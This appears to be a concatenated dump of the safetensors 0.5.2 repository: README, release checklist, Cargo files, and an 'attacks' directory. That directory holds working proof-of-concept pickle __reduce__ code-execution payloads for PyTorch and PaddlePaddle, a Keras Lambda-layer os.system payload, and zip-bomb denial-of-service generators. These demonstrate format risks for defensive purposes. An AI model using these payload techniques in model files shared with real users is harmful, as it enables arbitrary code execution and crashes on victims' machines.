APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. safetensors-0.5.2/Makefile000066400000000000000000000001311473753372300155230ustar00rootroot00000000000000doc: cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd .. safetensors-0.5.2/README.md000066400000000000000000000244131473753372300153530ustar00rootroot00000000000000

Hugging Face Safetensors Library

Python [![Pypi](https://img.shields.io/pypi/v/safetensors.svg)](https://pypi.org/pypi/safetensors/) [![Documentation](https://img.shields.io/website/http/huggingface.co/docs/safetensors/index.svg?label=docs)](https://huggingface.co/docs/safetensors/index) [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) [![Downloads](https://static.pepy.tech/badge/safetensors/month)](https://pepy.tech/project/safetensors) Rust [![Crates.io](https://img.shields.io/crates/v/safetensors.svg)](https://crates.io/crates/safetensors) [![Documentation](https://docs.rs/safetensors/badge.svg)](https://docs.rs/safetensors/) [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) [![Dependency status](https://deps.rs/repo/github/huggingface/safetensors/status.svg?path=safetensors)](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors) # safetensors ## Safetensors This repository implements a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). ### Installation #### Pip You can install safetensors via the pip manager: ```bash pip install safetensors ``` #### From source For the sources, you need Rust ```bash # Install Rust curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh # Make sure it's up to date and using stable channel rustup update git clone https://github.com/huggingface/safetensors cd safetensors/bindings/python pip install setuptools_rust pip install -e . ``` ### Getting started ```python import torch from safetensors import safe_open from safetensors.torch import save_file tensors = { "weight1": torch.zeros((1024, 1024)), "weight2": torch.zeros((1024, 1024)) } save_file(tensors, "model.safetensors") tensors = {} with safe_open("model.safetensors", framework="pt", device="cpu") as f: for key in f.keys(): tensors[key] = f.get_tensor(key) ``` [Python documentation](https://huggingface.co/docs/safetensors/index) ### Format - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header - N bytes: a JSON UTF-8 string representing the header. - The header data MUST begin with a `{` character (0x7B). - The header data MAY be trailing padded with whitespace (0x20). - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`, - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file), with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`). - A special key `__metadata__` is allowed to contain free form string-to-string map. Arbitrary JSON is not allowed, all values must be strings. - Rest of the file: byte-buffer. Notes: - Duplicate keys are disallowed. Not all parsers may respect this. - In general the subset of JSON is implicitly decided by `serde_json` for this library. Anything obscure might be modified at a later time, that odd ways to represent integer, newlines and escapes in utf-8 strings. This would only be done for safety concerns - Tensor values are not checked against, in particular NaN and +/-Inf could be in the file - Empty tensors (tensors with 1 dimension being 0) are allowed. They are not storing any data in the databuffer, yet retaining size in the header. They don't really bring a lot of values but are accepted since they are valid tensors from traditional tensor libraries perspective (torch, tensorflow, numpy, ..). - 0-rank Tensors (tensors with shape `[]`) are allowed, they are merely a scalar. - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents the creation of polyglot files. - Endianness: Little-endian. moment. - Order: 'C' or row-major. ### Yet another format ? The main rationale for this crate is to remove the need to use `pickle` on `PyTorch` which is used by default. There are other formats out there used by machine learning and more general formats. Let's take a look at alternatives and why this format is deemed interesting. This is my very personal and probably biased view: | Format | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8 | ----------------------- | --- | --- | --- | --- | --- | --- | --- | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ | | Arrow | ? | ? | ? | ? | ? | ? | ✗ | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code ? - Zero-copy: Does reading the file require more memory than the original file ? - Lazy loading: Can I inspect the file without loading everything ? And loading only some tensors in it without scanning the whole file (distributed setting) ? - Layout control: Lazy loading, is not necessarily enough since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important. - No file size limit: Is there a limit to the file size ? - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code ? (~ means we can store more than pure tensors, but no custom code) - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are necessary)? This is becoming increasingly important in the ML world. ### Main oppositions - Pickle: Unsafe, runs arbitrary code - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise actually. Some classic use after free issues: . On a very different level than pickle security-wise. Also 210k lines of code vs ~400 lines for this lib currently. - SavedModel: Tensorflow specific (it contains TF graph information). - MsgPack: No layout control to enable lazy loading (important for loading specific parts in distributed setting) - Protobuf: Hard 2Go max file size limit - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize). - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy. - Arrow: No `bfloat16` support. ### Notes - Zero-copy: No format is really zero-copy in ML, it needs to go from disk to RAM/GPU RAM (that takes time). On CPU, if the file is already in cache, then it can truly be zero-copy, whereas on GPU there is not such disk cache, so a copy is always required but you can bypass allocating all the tensors on CPU at any given point. SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but since deserialization is <<< of the time required to load the actual tensor data and is readable I went that way, (also space is <<< to the tensor data). - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the moment. - Order: 'C' or row-major. This seems to have won. We can add that information later if needed. - Stride: No striding, all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format. ### Benefits Since we can invent a new format we can propose additional benefits: - Prevent DOS attacks: We can craft the format in such a way that it's almost impossible to use malicious files to DOS attack a user. Currently, there's a limit on the size of the header of 100MB to prevent parsing extremely large JSON. Also when reading the file, there's a guarantee that addresses in the file do not overlap in any way, meaning when you're loading a file you should never exceed the size of the file in memory - Faster load: PyTorch seems to be the fastest file to load out in the major ML formats. However, it does seem to have an extra copy on CPU, which we can bypass in this lib by using `torch.UntypedStorage.from_file`. Currently, CPU loading times are extremely fast with this lib compared to pickle. GPU loading times are as fast or faster than PyTorch equivalent. Loading first on CPU with memmapping with torch, and then moving all tensors to GPU seems to be faster too somehow (similar behavior in torch pickle) - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to load only part of the tensors on the various models. For [BLOOM](https://huggingface.co/bigscience/bloom) using this format enabled to load the model on 8 GPUs from 10mn with regular PyTorch weights down to 45s. This really speeds up feedbacks loops when developing on the model. For instance you don't have to have separate copies of the weights when changing the distribution strategy (for instance Pipeline Parallelism vs Tensor Parallelism). License: Apache-2.0 safetensors-0.5.2/RELEASE.md000066400000000000000000000120571473753372300154770ustar00rootroot00000000000000## How to release # Before the release Simple checklist on how to make releases for `safetensors`. - Freeze `main` branch. - Run all tests (Check CI has properly run) - If any significant work, check benchmarks: - `cd safetensors && cargo bench` (needs to be run on latest release tag to measure difference if it's your first time) - Run all `transformers` tests. (`transformers` is a big user of `safetensors` we need to make sure we don't break it, testing is one way to make sure nothing unforeseen has been done.) - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`) - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers` test suite. - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708). This will create new docker images ready to run the tests suites with `safetensors` from the main branch. - Wait for actions to finish - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712) This will run the actual full test suite. - Check the results. - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (`safetensors` version need to make sure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154) For instance `safetensors>=0.10,<0.11` so we can safely upgrade to `0.11` without impacting current users - Then start a new PR containing all desired code changes from the following steps. - You will `Create release` after the code modifications are on `master`. # Rust - `safetensors` (rust, python & node) versions don't have to be in sync but it's very common to release for all versions at once for new features. - Edit `Cargo.toml` to reflect new version - Edit `CHANGELOG.md`: - Add relevant PRs that were added (python PRs do not belong for instance). - Add links at the end of the files. - Go to [Releases](https://github.com/huggingface/safetensors/releases) - Create new Release: - Mark it as pre-release - Use new version name with a new tag (create on publish) `vX.X.X`. - Copy paste the new part of the `CHANGELOG.md` - âš ï¸ Click on `Publish release`. This will start the whole process of building a uploading the new version on `crates.io`, there's no going back after this - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. # Python - Edit `bindings/python/setup.py` to reflect new version. - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version. - Edit `CHANGELOG.md`: - Add relevant PRs that were added (node PRs do not belong for instance). - Add links at the end of the files. - Go to [Releases](https://github.com/huggingface/safetensors/releases) - Create new Release: - Mark it as pre-release - Use new version name with a new tag (create on publish) `python-vX.X.X`. - Copy paste the new part of the `CHANGELOG.md` - âš ï¸ Click on `Publish release`. This will start the whole process of building a uploading the new version on `pypi`, there's no going back after this - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. - This CI/CD has 3 distinct builds, `Pypi`(normal), `conda` and `extra`. `Extra` is REALLY slow (~4h), this is normal since it has to rebuild many things, but enables the wheel to be available for old Linuxes # Node - Edit `bindings/node/package.json` to reflect new version. - Edit `CHANGELOG.md`: - Add relevant PRs that were added (python PRs do not belong for instance). - Add links at the end of the files. - Go to [Releases](https://github.com/huggingface/safetensors/releases) - Create new Release: - Mark it as pre-release - Use new version name with a new tag (create on publish) `node-vX.X.X`. - Copy paste the new part of the `CHANGELOG.md` - âš ï¸ Click on `Publish release`. This will start the whole process of building a uploading the new version on `npm`, there's no going back after this - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. # Testing the CI/CD for release If you want to make modifications to the CI/CD of the release GH actions, you need to : - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`. - Change the trigger mechanism so it can trigger every time you push to your branch. - Keep pushing your changes until the artifacts are properly created. safetensors-0.5.2/attacks/000077500000000000000000000000001473753372300155225ustar00rootroot00000000000000safetensors-0.5.2/attacks/README.md000066400000000000000000000056561473753372300170150ustar00rootroot00000000000000The purpose of this directory is to showcase various attacks (and creating your own). # Torch Arbitrary code execution Try it out. This will create a seemingly innocuous `torch_ace.pt` file. ``` python torch_ace_create.py python torch_ace_get_pwned.py ``` # PaddlePaddle Arbitrary code execution Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file. ``` python paddle_ace_create.py python paddle_ace_get_pwned.py ``` # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`) Try it out. This will create a seemingly innocuous `tf_ace.h5` file. ``` python tf_dos_create.py python tf_dos_get_pwned.py ``` # Torch Denial of Service (OOM kills the running process) Try it out. This will create a seemingly innocuous `torch_dos.pt` file. ``` python torch_dos_create.py python torch_dos_get_pwned.py ``` # Numpy Denial of Service (OOM kills the running process) Try it out. This will create a seemingly innocuous `numpy_dos.npz` file. ``` python numpy_dos_create.py python numpy_dos_get_pwned.py ``` # Safetensors abuse attempts In order to try and check the limits, we also try to abuse the current format. Please send ideas! A few things can be abused: - Proposal 1: The initial 8 bytes, which could be too big with regards to the file. This crashes, and crashes early (Out of bounds) (Attempt #1). - Proposal 2: The initial header is JSON, an attacker could use a 4Go JSON file to delay the loads. Debattable how much of an attack this is, but at least it's impossible to "bomb" (like the DOS attacks above) where the files are vastly smaller than their expanded version (because of zip abuse). Various "protections" could be put in place, like a header proportion cap (header should always be <<< of the size of the file). (Attempt #2) - Proposal 3: The offsets could be negative, out of the file. This is all crashing by default. - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok. While testing Proposal 2, I realized that the tensors themselves where all allocated, and gave me an idea for a DOS exploit where you would have a relatively small file a few megs tops, but defining many tensors on the same overlapping part of the file, it was essentially a DOS attack. The mitigation is rather simple, we sanitize the fact that the offsets must be contiguous and non overlapping. - Proposal 5: The offsets could mismatch the declared shapes + dtype. This validated against. - Proposal 6: The file being mmaped could be modified while it's opened (attacker has access to your filesystem, seems like you're already pwned). - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual rust compiled binary. ``` python safetensors_abuse_attempt_1.py python safetensors_abuse_attempt_2.py python safetensors_abuse_attempt_3.py ``` safetensors-0.5.2/attacks/numpy_dos_create.py000066400000000000000000000005171473753372300214370ustar00rootroot00000000000000from zipfile import ZIP_DEFLATED, ZipFile FILESIZE = 40 * 1000 # 40 Go BUFFER = b"\0" * 1000 * 1000 # 1Mo outfilename = "numpy_dos.npz" with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: with outzip.open("weights.npy", "w", force_zip64=True) as f: for i in range(FILESIZE): f.write(BUFFER) safetensors-0.5.2/attacks/numpy_dos_get_pwned.py000066400000000000000000000006631473753372300221520ustar00rootroot00000000000000import os import numpy as np filename = "numpy_dos.npz" print( f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." ) print("Be careful this might crash your computer by reserving way too much RAM") input("Press Enter to continue") archive = np.load(filename) weights = archive["weight"] assert np.allclose(weights, np.zeros((2, 2))) print("The file looks fine !") safetensors-0.5.2/attacks/paddle_ace_create.py000066400000000000000000000027361473753372300214700ustar00rootroot00000000000000import paddle import numpy as np from collections import Iterable, OrderedDict def _parse_every_object(obj, condition_func, convert_func): if condition_func(obj): return convert_func(obj) elif isinstance(obj, (dict, OrderedDict, list)): if isinstance(obj, list): keys = range(len(obj)) else: keys = list(obj.keys()) for key in keys: if condition_func(obj[key]): obj[key] = convert_func(obj[key]) else: obj[key] = _parse_every_object( obj[key], condition_func, convert_func ) return obj elif isinstance(obj, tuple): return tuple( _parse_every_object(list(obj), condition_func, convert_func) ) elif isinstance(obj, set): object(list(obj), condition_func, convert_func) else: return obj # hack _parse_every_object method paddle.framework.io._parse_every_object = _parse_every_object class BadDict(dict): def __init__(self, src: str, **kwargs): super().__init__(**kwargs) self.src = src def __reduce__(self): return ( eval, (f"os.system('{self.src}') or dict()",), None, None, iter(self.items()), ) paddle.save( [BadDict( 'echo "pwned your computer, I can do anything I want."', **{"weight": paddle.zeros((2, 2))}, )], "paddle_ace.pdparams", ) safetensors-0.5.2/attacks/paddle_ace_get_pwned.py000066400000000000000000000003101473753372300221630ustar00rootroot00000000000000import paddle weights = paddle.load("paddle_ace.pdparams")[0] assert list(weights.keys()) == ["weight"] assert paddle.allclose(weights["weight"], paddle.zeros((2, 2))) print("The file looks fine !") safetensors-0.5.2/attacks/safetensors_abuse_attempt_1.py000066400000000000000000000010311473753372300235600ustar00rootroot00000000000000import torch from safetensors.torch import load_file, save_file filename = "safetensors_abuse_attempt_1.safetensors" def create_payload(): weights = {"weight": torch.zeros((2, 2))} save_file(weights, filename) with open(filename, "r+b") as f: f.seek(0) # Now the header claims 2**32 - xx even though the file is small n = 1000 n_bytes = n.to_bytes(8, "little") f.write(n_bytes) create_payload() # This properly crashes with an out of bounds exception. test = load_file(filename) safetensors-0.5.2/attacks/safetensors_abuse_attempt_2.py000066400000000000000000000014271473753372300235720ustar00rootroot00000000000000import datetime import json import os from safetensors.torch import load_file filename = "safetensors_abuse_attempt_2.safetensors" def create_payload(): shape = [2, 2] n = shape[0] * shape[1] * 4 metadata = { f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10) } binary = json.dumps(metadata).encode("utf-8") n = len(binary) n_header = n.to_bytes(8, "little") with open(filename, "wb") as f: f.write(n_header) f.write(binary) f.write(b"\0" * n) create_payload() print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") start = datetime.datetime.now() test = load_file(filename) print(f"Loading the file took {datetime.datetime.now() - start}") safetensors-0.5.2/attacks/safetensors_abuse_attempt_3.py000066400000000000000000000014061473753372300235700ustar00rootroot00000000000000import datetime import json import os from safetensors.torch import load_file filename = "safetensors_abuse_attempt_2.safetensors" def create_payload(): shape = [200, 200] n = shape[0] * shape[1] * 4 metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)} binary = json.dumps(metadata).encode("utf-8") n = len(binary) n_header = n.to_bytes(8, "little") with open(filename, "wb") as f: f.write(n_header) f.write(binary) f.write(b"\0" * n) create_payload() print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") start = datetime.datetime.now() test = load_file(filename) print(f"Loading the file took {datetime.datetime.now() - start}") safetensors-0.5.2/attacks/tf_ace_create.py000066400000000000000000000007431473753372300206440ustar00rootroot00000000000000import tensorflow as tf def exec_(*args, **kwargs): import os os.system('echo "########################################\nI own you.\n########################################"') return 10 num_classes = 10 input_shape = (28, 28, 1) model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) ### # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"]) model.save("tf_ace.h5") ### safetensors-0.5.2/attacks/tf_ace_get_pwned.py000066400000000000000000000007511473753372300213540ustar00rootroot00000000000000import base64 import json import h5py import tensorflow as tf new_model = tf.keras.models.load_model("tf.h5") print("Transformers is not vulnerable to this, as it uses h5 directly.") print("Keras uses a pickled code of the function within the `h5` attrs of the file") print("Let's show you the marshalled code") with h5py.File("tf_ace.h5") as f: data = json.loads(f.attrs["model_config"]) print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0])) pass safetensors-0.5.2/attacks/tf_safe_ace_create.py000066400000000000000000000006341473753372300216410ustar00rootroot00000000000000import tensorflow as tf def exec_(*args, **kwargs): import os os.system('echo "########################################\nI own you.\n########################################"') return 10 num_classes = 10 input_shape = (28, 28, 1) model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) model.save("tf_ace.keras", save_format="keras_v3") safetensors-0.5.2/attacks/tf_safe_ace_get_pwned.py000066400000000000000000000001201473753372300223400ustar00rootroot00000000000000import tensorflow as tf new_model = tf.keras.models.load_model("tf_ace.keras") safetensors-0.5.2/attacks/torch_ace_create.py000066400000000000000000000007571473753372300213570ustar00rootroot00000000000000import torch class BadDict(dict): def __init__(self, src: str, **kwargs): super().__init__(**kwargs) self.src = src def __reduce__(self): return ( eval, (f"os.system('{self.src}') or dict()",), None, None, iter(self.items()), ) torch.save( BadDict( 'echo "pwned your computer, I can do anything I want."', **{"weight": torch.zeros((2, 2))}, ), "torch_ace.pt", ) safetensors-0.5.2/attacks/torch_ace_get_pwned.py000066400000000000000000000002721473753372300220600ustar00rootroot00000000000000import torch weights = torch.load("torch_ace.pt") assert list(weights.keys()) == ["weight"] assert torch.allclose(weights["weight"], torch.zeros((2, 2))) print("The file looks fine !") safetensors-0.5.2/attacks/torch_dos_create.py000066400000000000000000000012771473753372300214120ustar00rootroot00000000000000import os from zipfile import ZIP_DEFLATED, ZipFile import torch FILESIZE = 40 * 1000 # 40 Go BUFFER = b"\0" * 1000 * 1000 # 1 Mo filename = "torch_dos_tmp.pt" torch.save({"weight": torch.zeros((2, 2))}, filename) with ZipFile(filename, "r") as torch_zip: outfilename = "torch_dos.pt" with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read()) outzip.writestr("archive/version", torch_zip.open("archive/version").read()) with outzip.open("archive/data/0", "w", force_zip64=True) as f: for i in range(FILESIZE): f.write(BUFFER) os.remove(filename) safetensors-0.5.2/attacks/torch_dos_get_pwned.py000066400000000000000000000007151473753372300221170ustar00rootroot00000000000000import os import torch filename = "torch_dos.pt" print( f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." ) print("Be careful this might crash your computer by reserving way too much RAM") input("Press Enter to continue") weights = torch.load(filename) assert list(weights.keys()) == ["weight"] assert torch.allclose(weights["weight"], torch.zeros((2, 2))) print("The file looks fine !") safetensors-0.5.2/bindings/000077500000000000000000000000001473753372300156655ustar00rootroot00000000000000safetensors-0.5.2/bindings/.DS_Store000066400000000000000000000140041473753372300173470ustar00rootroot00000000000000Bud1onbwspblobpythonbwspblob¸bplist00Ö ]ShowStatusBar[ShowToolbar[ShowTabView_ContainerShowSidebar\WindowBounds[ShowSidebar  _{{900, 282}, {900, 281}} #/;R_klmnoŠ ‹pythonvSrnlong  @€ @€ @€ @ EDSDB `€ @€ @€ @safetensors-0.5.2/bindings/python/000077500000000000000000000000001473753372300172065ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/.gitignore000066400000000000000000000012551473753372300212010ustar00rootroot00000000000000/target # Byte-compiled / optimized / DLL files __pycache__/ .pytest_cache/ *.py[cod] # C extensions *.so # Distribution / packaging .Python .venv/ env/ bin/ build/ develop-eggs/ dist/ eggs/ lib/ lib64/ parts/ sdist/ var/ include/ man/ venv/ *.egg-info/ .installed.cfg *.egg # Installer logs pip-log.txt pip-delete-this-directory.txt pip-selfcheck.json # Unit test / coverage reports htmlcov/ .tox/ .coverage .cache nosetests.xml coverage.xml # Translations *.mo # Mr Developer .mr.developer.cfg .project .pydevproject # Rope .ropeproject # Django stuff: *.log *.pot .DS_Store # Sphinx documentation docs/_build/ # PyCharm .idea/ # VSCode .vscode/ # Pyenv .python-versionsafetensors-0.5.2/bindings/python/Cargo.lock000066400000000000000000000137471473753372300211270ustar00rootroot00000000000000# This file is automatically @generated by Cargo. # It is not intended for manual editing. version = 4 [[package]] name = "autocfg" version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ace50bade8e6234aa140d9a2f552bbee1db4d353f69b8217bc503490fc1a9f26" [[package]] name = "cfg-if" version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "heck" version = "0.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" [[package]] name = "indoc" version = "2.0.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b248f5224d1d606005e02c97f5aa4e88eeb230488bcc03bc9ca4d7991399f2b5" [[package]] name = "itoa" version = "1.0.14" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d75a2a4b1b190afb6f5425f10f6a8f959d2ea0b9c2b1d79553551850539e4674" [[package]] name = "libc" version = "0.2.169" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b5aba8db14291edd000dfcc4d620c7ebfb122c613afb886ca8803fa4e128a20a" [[package]] name = "memchr" version = "2.7.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "78ca9ab1a0babb1e7d5695e3530886289c18cf2f87ec19a575a0abdce112e3a3" [[package]] name = "memmap2" version = "0.9.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fd3f7eed9d3848f8b98834af67102b720745c4ec028fcd0aa0239277e7de374f" dependencies = [ "libc", ] [[package]] name = "memoffset" version = "0.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "488016bfae457b036d996092f6cb448677611ce4449e970ceaf42695203f218a" dependencies = [ "autocfg", ] [[package]] name = "once_cell" version = "1.20.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1261fe7e33c73b354eab43b1273a57c8f967d0391e80353e51f764ac02cf6775" [[package]] name = "portable-atomic" version = "1.10.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "280dc24453071f1b63954171985a0b0d30058d287960968b9b2aca264c8d4ee6" [[package]] name = "proc-macro2" version = "1.0.92" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "37d3544b3f2748c54e147655edb5025752e2303145b5aefb3c3ea2c78b973bb0" dependencies = [ "unicode-ident", ] [[package]] name = "pyo3" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e484fd2c8b4cb67ab05a318f1fd6fa8f199fcc30819f08f07d200809dba26c15" dependencies = [ "cfg-if", "indoc", "libc", "memoffset", "once_cell", "portable-atomic", "pyo3-build-config", "pyo3-ffi", "pyo3-macros", "unindent", ] [[package]] name = "pyo3-build-config" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "dc0e0469a84f208e20044b98965e1561028180219e35352a2afaf2b942beff3b" dependencies = [ "once_cell", "target-lexicon", ] [[package]] name = "pyo3-ffi" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "eb1547a7f9966f6f1a0f0227564a9945fe36b90da5a93b3933fc3dc03fae372d" dependencies = [ "libc", "pyo3-build-config", ] [[package]] name = "pyo3-macros" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fdb6da8ec6fa5cedd1626c886fc8749bdcbb09424a86461eb8cdf096b7c33257" dependencies = [ "proc-macro2", "pyo3-macros-backend", "quote", "syn", ] [[package]] name = "pyo3-macros-backend" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "38a385202ff5a92791168b1136afae5059d3ac118457bb7bc304c197c2d33e7d" dependencies = [ "heck", "proc-macro2", "pyo3-build-config", "quote", "syn", ] [[package]] name = "quote" version = "1.0.38" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0e4dccaaaf89514f546c693ddc140f729f958c247918a13380cccc6078391acc" dependencies = [ "proc-macro2", ] [[package]] name = "ryu" version = "1.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "f3cb5ba0dc43242ce17de99c180e96db90b235b8a9fdc9543c96d2209116bd9f" [[package]] name = "safetensors" version = "0.5.2" dependencies = [ "serde", "serde_json", ] [[package]] name = "safetensors-python" version = "0.5.2" dependencies = [ "memmap2", "pyo3", "safetensors", "serde_json", ] [[package]] name = "serde" version = "1.0.217" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "02fc4265df13d6fa1d00ecff087228cc0a2b5f3c0e87e258d8b94a156e984c70" dependencies = [ "serde_derive", ] [[package]] name = "serde_derive" version = "1.0.217" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "5a9bf7cf98d04a2b28aead066b7496853d4779c9cc183c440dbac457641e19a0" dependencies = [ "proc-macro2", "quote", "syn", ] [[package]] name = "serde_json" version = "1.0.135" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2b0d7ba2887406110130a978386c4e1befb98c674b4fba677954e4db976630d9" dependencies = [ "itoa", "memchr", "ryu", "serde", ] [[package]] name = "syn" version = "2.0.95" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "46f71c0377baf4ef1cc3e3402ded576dccc315800fbc62dfc7fe04b009773b4a" dependencies = [ "proc-macro2", "quote", "unicode-ident", ] [[package]] name = "target-lexicon" version = "0.12.16" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "61c41af27dd6d1e27b1b16b489db798443478cef1f06a660c96db617ba5de3b1" [[package]] name = "unicode-ident" version = "1.0.14" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "adb9e6ca4f869e1180728b7950e35922a7fc6397f7b641499e8f3ef06e50dc83" [[package]] name = "unindent" version = "0.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c7de7d73e1754487cb58364ee906a499937a0dfabd86bcb980fa99ec8c8fa2ce" safetensors-0.5.2/bindings/python/Cargo.toml000066400000000000000000000006131473753372300211360ustar00rootroot00000000000000[package] name = "safetensors-python" version = "0.5.2" edition = "2021" # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html [lib] name = "safetensors_rust" crate-type = ["cdylib"] [dependencies] pyo3 = { version = "0.23", features = ["abi3", "abi3-py38"] } 